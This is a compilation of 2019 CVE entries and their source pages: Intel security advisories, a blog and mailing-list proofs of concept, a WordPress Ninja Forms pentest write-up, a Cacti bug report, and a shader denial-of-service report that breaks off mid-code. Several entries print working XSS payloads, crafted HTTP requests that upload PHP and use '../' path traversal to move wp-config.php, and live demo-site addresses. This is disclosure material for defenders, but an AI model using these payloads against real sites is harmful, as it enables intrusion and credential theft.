Insufficient password protection in the attestation database for Open CIT may allow an authenticated user to potentially enable information disclosure via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Open Cloud Integrity Technology and OpenAttestation Advisory**

**Summary: **

Multiple potential security vulnerabilities in Open Cloud Integrity Technology (Open CIT) and OpenAttestation may allow information disclosure. Intel is releasing software updates to mitigate these potential vulnerabilities.

**Vulnerability Details:**

CVEID: CVE-2019-0179

Description: Insufficient password protection in the attestation database for Open CIT may allow an authenticated user to potentially enable information disclosure via local access.

CVSS Base Score: 4.4 Medium

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

CVEID: CVE-2019-0180

Description: Insufficient password protection in the configuration files for Open CIT may allow an authenticated user to potentially enable information disclosure via local access.

CVSS Base Score: 4.4 Medium

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

CVEID: CVE-2019-0178

Description: A race condition in the agent service for Open CIT may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 4.4 Medium

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

CVEID: CVE-2019-0177

Description: Insufficient input validation in the attestation process for Open CIT may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 4.4 Medium

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

CVEID: CVE-2019-0175

Description: Insufficient session validation in the attestation process for OpenAttestation may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 4.4 Medium

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

CVEID: CVE-2019-0181

Description: Improper input validation in the database for Open CIT and OpenAttestation may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.7 Medium

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CVEID: CVE-2019-0182

Description: Relative path traversal in the login routine for Open CIT and OpenAttestation may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 3.3 Low

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

CVEID: CVE-2019-0183

Description: Insufficient password handling in the login routine for Open CIT may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 3.3 Low

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

CVEID: CVE-2019-11092

Description: Insufficient password handling in the login routine for Open CIT may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 4.4 Medium

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

**Affected Products:**

All versions of Open CIT and OpenAttestation.

**Recommendation:**

Intel recommends users of Open CIT and OpenAttestation discontinue use and move to Intel® Security Libraries for Data Center (Intel® SecL-DC).

Updates are available for download at this location: https://01.org/intel-secl

**Acknowledgements:**

These issues were found internally by Intel.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are deployed.

**Revision History**

Revision

Date

Description

1.0

06/11/2019  

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2019-0181: INTEL-SA-00248

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® Xeon® W Processors**

Helping deliver a giant leap in performance and platform capabilities for professional creatives, engineers and data scientists.

Learn more

Innovation

**4th Gen Intel® Xeon® Scalable Processors**

With the most built-in accelerators of any CPU on the market, 4th Gen Intel® Xeon® Scalable processors accelerate performance for AI and other emerging workloads.

**Accelerate Your Most Advanced Edge Workloads**

Deliver performance, connectivity, memory, and accelerated AI with 4th Gen Intel® Xeon® Scalable processors for edge applications.

**Enable Edge Networks**

Improve network capacity and total cost of ownership while meeting power consumption and space requirements for 5G and network infrastructure.

**The Future of Acceleration Has Arrived**

Discover the future of acceleration with the launch of our highly anticipated 4th Gen Intel® Xeon® Scalable processors and other innovations.

Innovation

**Introducing Intel® Xeon® CPU Max Series**

Reduce the bottlenecks of memory-bound applications to deliver breakthrough performance with up to 56 performance cores, 64GB of high bandwidth memory, and cost and time savings with the only x86-based processor with high-bandwidth memory (HBM).

Data Center

**Introducing Intel® Data Center GPU Max Series**

Maximize impact with the Intel® Data Center GPU Max Series, Intel’s highest performing, highest density, general-purpose discrete GPU, which packs over 100 billion transistors into one package and contains up to 128 Xe Cores–Intel’s foundational GPU compute building block.

Innovation

**Intel at Mobile World Congress Barcelona**

Join us at MWC Barcelona to experience how Intel is speeding the shift to fully programmable, software-defined, cloud-native networks that unleash the possibilities of 5G, AI, and the Intelligent Edge.

Innovation

**13th Gen Intel® Core™ Mobile Processors for Edge**

With industrial-grade features and extended temperature ranges of -40C to 100C (available on select SKUs), 13th Gen Intel® Core™ mobile processors combine power efficiency and consistent performance for AI, graphics, and industrial-grade apps.

CVE-2019-0177: Intel | Data Center Solutions, IoT, and PC Innovation

PHP Scripts Mall Chartered Accountant : Auditor Website 2.0.1 has Stored XSS in the Profile Update page via the My Name field.

**CVE-2019-7553 Stores XSS in PHP Scripts Mall Chartered Accountant : Auditor Website 2.0.1**

**_DESCRIPTION_**

**PHP Scripts Mall Chartered Accountant : Auditor Website 2.0.1 has**  
 **Stored XSS in the Profile Update page via the My Name field.**  

**_VENDOR_**

PHP Scripts Mall Pvt. Ltd.  
 _\[Affected Product Code Base\]_PHP Scripts Mall Chartered Accountant : Auditor Website - 2.0.1  
  

**_POC_**

 Steps to reproduce-

Go to http://74.124.215.220/~projclient/client/auditor

 1. Register and login an account.

2\. GO to My Profile and update the My name field with the xss payload

  <--\`<img/src=\` onerror=alert("Pw")> --!>.

3\. The xss will be executed throughout all the pages visited.

**Popular posts from this blog**

DESCRIPTION An issue was discovered in PHP Scripts Mall Investment MLM Software 2.0.2.  Stored XSS was found in the the My Profile Section. This is due to lack of sanitization in the Edit Name section. VENDOR PHP Scripts Mall Pvt. Ltd.   \[Affected Product Code Base\] Investment MLM Software(link- https://www.phps criptsmall.com/product/investm ent-mlm/ ) - 2.0.2 POC 1.GO to  http://198.38.86.159/~onlineex amboard/demo/investment-mlm/ 2. Request a test account "Click Here For User Demo Link" 3. Login and go to my profile. 4. Input payload  <script>alert(document.domain) </script>  and xss gets popped. PROOF

DESCRIPTION An issue was discovered in PHP Scripts Mall API Based Travel Booking 3.4.7. There is Reflected XSS via the flight-results.php d2 parameter. Tested in Firefox Dev Edition VENDOR PHP Scripts Mall Pvt. Ltd.   \[Affected Product Code Base\] API based travel booking - 3.4.7 POC 1.GO to  http://74.124.215.220/~config/cleotravel/flight-results.php?a1=adf&a2=adfdf&d1=&d2=%22Style=%22position:fixed;top:0;left:0;font-size:999px;%22OnMouseEnter=%22confirm\`K\`%22 REFLECTED XSS POPPED

CVE-2019-7553: CVE-2019-7553 Stores XSS in PHP Scripts Mall Chartered Accountant : Auditor Website 2.0.1

GAT-Ship Web Module through 1.30 allows remote attackers to obtain potentially sensitive information via {} in a ws/gatshipWs.asmx/SqlVersion request.

**Full Disclosure mailing list archives****GAT-Ship Web Module >1.30 - Unauthenticated Information Disclosure Vulnerability**

_From_: <gionreale () tutanota com>  
_Date_: Fri, 17 May 2019 13:43:49 +0200 (CEST)  

GAT-Ship Web Module >1.30 - Unauthenticated Information Disclosure Vulnerability


It is possible in versions 1.30 and below for unauthenticated attackers to query the GAT-Ship Web Module for system 
information via a crafted request:

PoC:
---------------------------------------------------------------------------------------------------------------------------------------

POST /ws/gatshipWs.asmx/SqlVersion <http://gatshipWs.asmx/SqlVersion\> HTTP/1.1
 User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:52.0) Gecko/20100101 Firefox/52.0
 Accept: application/json, text/javascript, \*/\*; q=0.01
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Content-Type: application/json; charset=utf-8
 X-Requested-With: XMLHttpRequest 
 Content-Length: 2
 DNT: 1
 Connection: close
 
 {}

--------------------------------------------------------------------------------------------------------------------------------------------------




HTTP/1.1 200 OK
 Cache-Control: private, max-age=0
 Content-Type: application/json; charset=utf-8
 Server: Microsoft-IIS/X.X
 X-AspNet-Version: X.X.XXXXX
 X-Powered-By: ASP.NET
 Date: Mon, XX XXX 20XX 06:55:31 GMT
 Connection: close
 Content-Length: 310
 
 {"d":{"\_\_type":"webModule.ws.gatshipWs+ResponsObject","ResponsType":0,"MessageText":null,"Data":"Microsoft SQL Server 
20XX (SPX) - XX.X.XXXX.X (X64) \\n\\tDec 28 20XX 20:23:12 \\n\\tCopyright (c) Microsoft Corporation\\n\\tStandard Edition 
(64-bit) on Windows XX XX \\u003cX64\\u003e (Build XXXX: Service Pack X)\\n"}}

===================================================================================

Values in PoC removed for security reasons.


Disclosed: 16 Jul 2018

Fix: Upgrade to current version.


Discovered by Gionathan Armando Reale


\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

**Current thread:**

*   **GAT-Ship Web Module >1.30 - Unauthenticated Information Disclosure Vulnerability** _gionreale (May 17)_
    *   Re: GAT-Ship Web Module >1.30 - Unauthenticated Information Disclosure Vulnerability _gionreale (May 21)_

CVE-2019-12163: Full Disclosure: GAT-Ship Web Module >1.30

Insufficient input validation vulnerability in subsystem for Intel(R) AMT before version 12.0.35 may allow a privileged user to potentially enable denial of service via network access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® CSME, Intel® SPS, Intel® TXE, Intel® DAL, and Intel® AMT 2019.1 QSR Advisory**

Intel ID:

INTEL-SA-00213

Advisory Category:

Firmware, Software

Impact of vulnerability:

Escalation of Privilege, Denial of Service, Information Disclosure

Severity rating:

HIGH

Original release:

05/14/2019

Last revised:

04/14/2020

**Summary: **

Multiple potential security vulnerabilities in Intel® Converged Security & Management Engine (Intel® CSME), Intel® Server Platform Services (Intel® SPS), Intel® Trusted Execution Engine Interface (Intel® TXE), Intel® Dynamic Application Loader (Intel® DAL), and Intel® Active Management Technology (Intel® AMT) may allow escalation of privilege, information disclosure, and/or denial of service. Intel is releasing Intel® CSME, Intel® SPS, Intel® TXE, and Intel® AMT updates to mitigate these potential vulnerabilities.

**Vulnerability Details:**

CVEID: CVE-2019-0089

Description: Improper data sanitization vulnerability in subsystem in Intel(R) SPS before versions SPS\_E5\_04.00.04.381.0, SPS\_E3\_04.01.04.054.0, SPS\_SoC-A\_04.00.04.181.0, and SPS\_SoC-X\_04.00.04.086.0 may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 8.1 High

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:L/I:H/A:H

CVEID: CVE-2019-0090

Description:  Insufficient access control vulnerability in subsystem for Intel(R) CSME versions 11.x, Intel(R) CSME version 12.0.35, Intel(R) TXE versions 3.x, 4.x, Intel(R) Server Platform Services versions 3.x, 4.x, before SPS\_E3\_05.01.03.094.0 may allow an unauthenticated user to potentially enable escalation of privilege via physical access.

CVSS Base Score: 7.1 High  

CVSS Vector: CVSS:3.0/AV:P/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

CVEID: CVE-2019-0086

Description: Insufficient access control vulnerability in Dynamic Application Loader software for Intel(R) CSME before versions 11.8.65, 11.11.65, 11.22.65, 12.0.35 and Intel(R) TXE 3.1.65, 4.0.15 may allow an unprivileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 7.8 High

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVEID: CVE-2019-0091

Description: Code injection vulnerability in installer for Intel(R) CSME before versions 11.8.65, 11.11.65, 11.22.65, 12.0.35 and Intel(R) TXE 3.1.65, 4.0.15 may allow an unprivileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.6 Medium

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:H

CVEID: CVE-2019-0092

Description: Insufficient input validation vulnerability in subsystem for Intel(R) AMT before versions 11.8.65, 11.11.65, 11.22.65, 12.0.35 may allow an unauthenticated user to potentially enable escalation of privilege via physical access.

CVSS Base Score: 6.8 Medium

CVSS Vector: CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVEID: CVE-2019-0093

Description: Insufficient data sanitization vulnerability in HECI subsystem for Intel(R) CSME before versions 11.8.65, 11.11.65, 11.22.65, 12.0.35 and Intel(R) SPS before version SPS\_E3\_05.01.03.094.0 may allow a privileged user to potentially enable information disclosure via local access.

CVSS Base Score: 2.3 Low

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N

CVEID: CVE-2019-0094

Description: Insufficient input validation vulnerability in subsystem for Intel(R) AMT before versions 11.8.65, 11.11.65, 11.22.65, 12.0.35 may allow an unauthenticated user to potentially enable denial of service via adjacent network access.

CVSS Base Score: 4.3 Medium

CVSS Vector: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

CVEID: CVE-2019-0096

Description: Out of bound write vulnerability in subsystem for Intel(R) AMT before versions 11.8.65, 11.11.65, 11.22.65, 12.0.35 may allow an authenticated user to potentially enable escalation of privilege via adjacent network access.

CVSS Base Score: 6.7 Medium

CVSS Vector: CVSS:3.0/AV:A/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:H

CVEID: CVE-2019-0097

Description: Insufficient input validation vulnerability in subsystem for Intel(R) AMT before version 12.0.35 may allow a privileged user to potentially enable denial of service via network access.

CVSS Base Score: 4.9 Medium

CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H

CVEID: CVE-2019-0098

Description: Logic bug vulnerability in subsystem for Intel(R) CSME before version 12.0.35, Intel(R) TXE before 3.1.65, 4.0.15 may allow an unauthenticated user to potentially enable escalation of privilege via physical access.

CVSS Base Score: 5.7 Medium

CVSS Vector: CVSS:3.0/AV:P/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

CVEID: CVE-2019-0099

Description: Insufficient access control vulnerability in subsystem in Intel(R) SPS before version SPS\_E3\_05.01.03.094.0 may allow an unauthenticated user to potentially enable escalation of privilege via physical access.

CVSS Base Score: 5.7 Medium

CVSS Vector: CVSS:3.0/AV:P/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

CVEID: CVE-2019-0153

Description: Buffer overflow in subsystem in Intel(R) CSME 12.0.0 through 12.0.34 may allow an unauthenticated user to potentially enable escalation of privilege via network access.  

CVSS Base Score: 9.0 Critical

CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

CVEID: CVE-2019-0170

Description: Buffer overflow in subsystem in Intel(R) DAL before version 12.0.35 may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 8.2 High

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

**Affected Products:**

Intel® CSME before versions 11.8.65, 11.11.65, 11.22.65, 12.0.35

Intel® CSME, Intel® Active Management Technology, and Intel® DAL

Updated Intel® CSME Firmware Version

Replaces Intel® CSME Firmware Version

11.8.65

11.0 thru 11.8.60

11.11.65

11.10 thru 11.11.60

11.22.65

11.20 thru 11.22.60

12.0.35

12.0 thru 12.0.20

Intel® Server Platform Services before versions SPS\_E3\_05.01.03.094.0, SPS\_E5\_04.00.04.381.0 and SPS\_E5\_04.01.04.054.0 

Intel® Server Platform Services

Updated Intel® Server Platform Services Firmware Version

Replaces Intel® Server Platform Services Firmware Version

SPS\_E3\_05.01.03.094.0, SPS\_SoC-A\_04.00.04.181.0 and SPS\_SoC-X\_04.00.04.086.0

SPS\_E3\_05.00.00.000.0 thru SPS\_E3\_05.00.04.027.0, SPS\_SoC-A\_04.00.00.000.0 thru SPS\_SoC-A\_04.00.04.177.0

SPS\_E5\_04.00.04.381.0

SPS\_E5\_04.00.00 through SPS\_E5\_04.00.03

SPS\_E5\_04.01.04.054.0

SPS\_E5\_04.01.00 through SPS\_E5\_04.01.03

Intel® Trusted Execution Engine before TXE 3.1.65, 4.0.15

Intel® Trusted Execution Engine

Updated Intel® Trusted Execution Engine Firmware Version

Replaces Intel® Trusted Execution Engine Firmware Version

3.1.65

3.0 thru 3.1.50

4.0.15

4.0 thru 4.0.5

**Note**:  Firmware versions of Intel® ME 3.x thru 10.x, Intel® TXE 1.x thru 2.x and Intel® Server Platform Services 1.x thru 2.X are no longer supported, thus were not assessed for the vulnerabilities/CVEs listed in this Technical Advisory. There is no new release planned for these versions.

**Recommendations:**

Intel recommends that users of Intel® CSME, Intel® SPS, Intel® TXE, Intel® DAL, and Intel® AMT update to the latest version provided by the system manufacturer that addresses these issues.

Consult updated security guidance for CVE-2019-0090 published here. Additional information on this vulnerability can be found in the CVE-2019-0090 Technical Whitepaper here. 

**Acknowledgements:**

Intel would like to thank Lasse Borup (CVE-2019-0086) for reporting this issue.

CVE-2019-0090 was initially found externally by an Intel partner and subsequently reported by Positive Technologies researchers. Intel would like to thank Mark Ermolov, Dmitry Sklyarov and Maxim Goryachy from Positive Technologies for reporting this issue.

The additional issues were found internally by Intel employees. Intel would like to thank Alex Gutkin, Arie Haenel, Michael Henry, Moshe Wagner, Tikvah Katz, Yaakov Cohen and Yair Netzer.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

05/14/2019  

Initial Release

1.1

05/20/2019

CVE correction

1.2

07/01/2019

Updated Affected Products

1.3

02/11/2020

Updates to CVE-2019-0090, recommendations and acknowledgements  

1.4

02/14/2020

Clarified versions in CVE-2019-0090  

1.5

03/11/2020

Updates to SPS versions in:

*   CVE-2019-0090, CVE-2019-0093, CVE-2019-0099.  
    
*   Affected products section.   
    

1.6

04/14/2020

Updates to affected SPS versions  

Updates to the recommendation; added link to the Technical whitepaper for CVE-2019-0090  

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

© Intel Corporation.  Intel, the Intel logo, and other Intel marks are trademarks of Intel Corporation or its subsidiaries United States and other countries.  Other names and brands may be claimed as the property of others.

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2019-0097: INTEL-SA-00213

Path Traversal and Unrestricted File Upload exists in the Ninja Forms plugin before 3.0.23 for WordPress (when the Uploads add-on is activated). This allows an attacker to traverse the file system to access files and execute code via the includes/fields/upload.php (aka upload/submit page) name and tmp_name parameters.

During a recent Pentest for one of our clients, we discovered Path Traversal and Unrestricted File Upload vulnerabilities in the WordPress plugin Ninja Forms with its File Upload extension (v3.0.22) enabled.

This eventually allows an unauthenticated attacker to traverse the file system to access files and execute code via the includes/fields/upload.php (aka upload/submit page) **name** and **tmp\_name** parameters.

**Initial file upload Request:**

POST /wp-admin/admin-ajax.php?action=nf\_fu\_upload HTTP/1.1
Host: testserver.com
Content-Type: multipart/form-data; boundary=---------------------------16345274557837
Content-Length: 522

-----------------------------16345274557837
Content-Disposition: form-data; name="form\_id"

1
-----------------------------16345274557837
Content-Disposition: form-data; name="field\_id"

5
-----------------------------16345274557837
Content-Disposition: form-data; name="nonce"

0f3a997174
-----------------------------16345274557837
Content-Disposition: form-data; name="files"; filename="test.png.doc"
Content-Type: application/msword

<?php phpinfo(); ?>
-----------------------------16345274557837--

**Response:**

HTTP/1.1 200 OK  
Server: nginx/1.14.0 

"data":{    
    "files":\[    
       {    
          "name":"test.png.doc",  
          "type":"application\\/msword",  
          "tmp\_name":"nftmp-14FpD-test.png.doc",  
          "error":0,  
          "size":19  
       }  
    \]  
 }

When the form is submitted the initially uploaded tmp file is moved to a new location:

POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: testserver.com  
Content-Length: 6850

\--snip--   
"5":{    
  "value":1,  
  "id":5,  
  "files":\[    
     {    
        "name":"test.(php)",  
        "tmp\_name":"nftmp-BNxfG-test.png.doc",  
        "fieldID":5  
     }  
  \]  
 --snip--

The parameter “name” is then “sanitized” by the WordPress function **sanitize\_file\_name**, which essentially only removes a set of predefined special characters:

ninja-forms-uploads/includes/fields/upload.php:124  
$file\_name = sanitize\_file\_name(basename($target\_file)); 

**sanitize\_file\_name**   
Removes special characters that are illegal in filenames    
on certain operating systems and special characters   
requiring special escaping to manipulate at the command line.   
Replaces spaces and consecutive dashes with a single dash.    
Trims period, dash and underscore from beginning and end of filename.    
It is not guaranteed that this function will return a filename   
that is allowed to be uploaded. 

https://developer.wordpress.org/reference/functions/sanitize\_file\_name/

This results in moving the tmp file to its final location:  
/**wp-content/uploads/ninja-forms/1/test.php**

If the upload folder has not been made non-executable explicitly, which is not the case by default, this results in code execution:

code execution

**Path Traversal in tmp\_name**

when submitting the form it is also possible to traverse the filesystem through the tmp\_name parameter as shown below. Keep in mind that tmp files are moved to their new location within the uploads folder!

POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: testserver.com  
Content-Length: 6850

\--snip--   
"5":{    
  "value":1,  
  "id":5,  
  "files":\[    
     {    
        "name":"test.doc",  
        "tmp\_name":"../../../../wp-config.php",  
        "fieldID":5  
     }  
  \]  
 --snip--

This results in moving the wp-config.php file to the following location:  
**/wp-content/uploads/ninja-forms/1/test.doc**  

  

The vendor was informed and both vulnerabilities have been fixed in its most recent version (3.0.23). Updating the ninja-forms-uploads plugin is highly recommended! 

\# Exploit Title: Path Traversal and Unrestricted File Upload in Ninja Forms Uploads  
# Date: 05-04-2019  
# Exploit Author: Jasper Weijts, Onvio, https://www.onvio.nl/  
# Vendor Homepage: https://www.ninjaforms.com/  
# Version: <= 3.0.22  
# Tested on: Ubuntu 16 - nginx/1.14.0 - WordPress 5.1.1 - Firefox  
# CVE : CVE-2019-10869

CVE-2019-10869: Pentest reveals vulnerabilities in WordPress plugin Ninja Forms

In clearFilter() in utilities.php in Cacti before 1.2.3, no escaping occurs before printing out the value of the SNMP community string (SNMP Options) in the View poller cache, leading to XSS.

**Describe the bug**  
There's no escape being done before printing out the value of SNMP community string (SNMP Options) in the View poller cache.

**To Reproduce**  
Steps to reproduce the behavior:

1.  Login as normal user ( should have device creation explicitly enabled ).
    
2.  Select create a new device from the console menu.
    
3.  Enter the below shared payload into the "SNMP community string" field & save the device. Payload - <script> alert('XSS'); document.location.replace('//google.com');</script>\`
    
4.  Now login as an Admin user & go to Utilities > System utils > View poller cache, XSS would be trigerred & redirected to google.com as specified in the payload. .
    

**Expected behavior**  
Proper filtration & escaping needs to be done, before taking in the data from the user.

**Screenshots**  

**Desktop (please complete the following information):**

*   OS: Ubuntu 16.04
*   Browser: Firefox

**Smartphone (please complete the following information):**

**Additional context**  
Vulnerable snippet:

Line 1849 in utilities.php  
__('Community:') . ' ' . $item['snmp_community']

CVE-2019-11025: When viewing poller cache, Device SNMP community is not properly escaped · Issue #2581 · Cacti/cacti

In the wp-google-maps plugin before 7.11.18 for WordPress, includes/class.rest-api.php in the REST API does not sanitize field names before a SELECT statement.

CVE-2019-10692: WP Google Maps

A remote denial-of-service vulnerability exists in the way the Nouveau Display Driver (the default Ubuntu Nvidia display driver) handles GPU shader execution. A specially crafted pixel shader can cause remote denial-of-service issues. An attacker can provide a specially crafted website to trigger this vulnerability. This vulnerability can be triggered remotely after the user visits a malformed website. No further user interaction is required. Vulnerable versions include Ubuntu 18.04 LTS (linux 4.15.0-29-generic x86_64), Nouveau Display Driver NV117 (vermagic: 4.15.0-29-generic SMP mod_unload).

**Summary**

A remote denial-of-service vulnerability exists in the way the Nouveau display driver (the default Ubuntu Nvidia display driver) handles GPU shader execution. A specially crafted pixel shader can cause remote denial-of-service issues. An attacker can provide a specially crafted website to trigger this vulnerability. This vulnerability can be triggered remotely after the user visits a malformed website. No further user interaction is required.

**Tested Versions**

Ubuntu 18.04 LTS (linux 4.15.0-29-generic x86\_64), Nouveau Display Driver NV117 (vermagic: 4.15.0-29-generic SMP mod\_unload)

**Product URLs**

https://nouveau.freedesktop.org/wiki/ http://ubuntu.com

**CVSSv3 Score**

7.4 - AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:H

**CWE**

CWE-400: Uncontrolled Resource Consumption

**Details**

This vulnerability can be triggered by a user visiting a specifically crafted website. Such an attack can render the entire machine frozen until the machine reboots (in most cases a manual machine reboot is required). We were able to launch this attack remotely using popular browsers on the client’s end, such as Google Chrome and Mozilla Firefox.

Nouveau is a free and open-source graphics device driver for Nvidia video cards and the Tegra family of systems on a chip written by independent software engineers with minor help from Nvidia employees. The project’s goal is to create an open-source driver by reverse engineering Nvidia’s proprietary Linux drivers. It is managed by the X.Org Foundation, hosted by freedesktop.org, and is distributed as part of Mesa 3D. Since the Ubuntu 10.04 LTS (Lucid Lynx), Ubuntu decided to switch the Nvidia graphics driver to Nouveau by default \[1\].

The following shader is triggering the denial-of-service vulnerability on an Ubuntu machine:

    #ifdef GL_ES
    precision mediump float;
    #endif
    
    uniform float time;
    
    #define LINEAR_INTERPOLATION
    
    vec3 func4(float index) {
        index = mod(index * index, 250.0);
        vec3 xout = vec3(index, index, index);
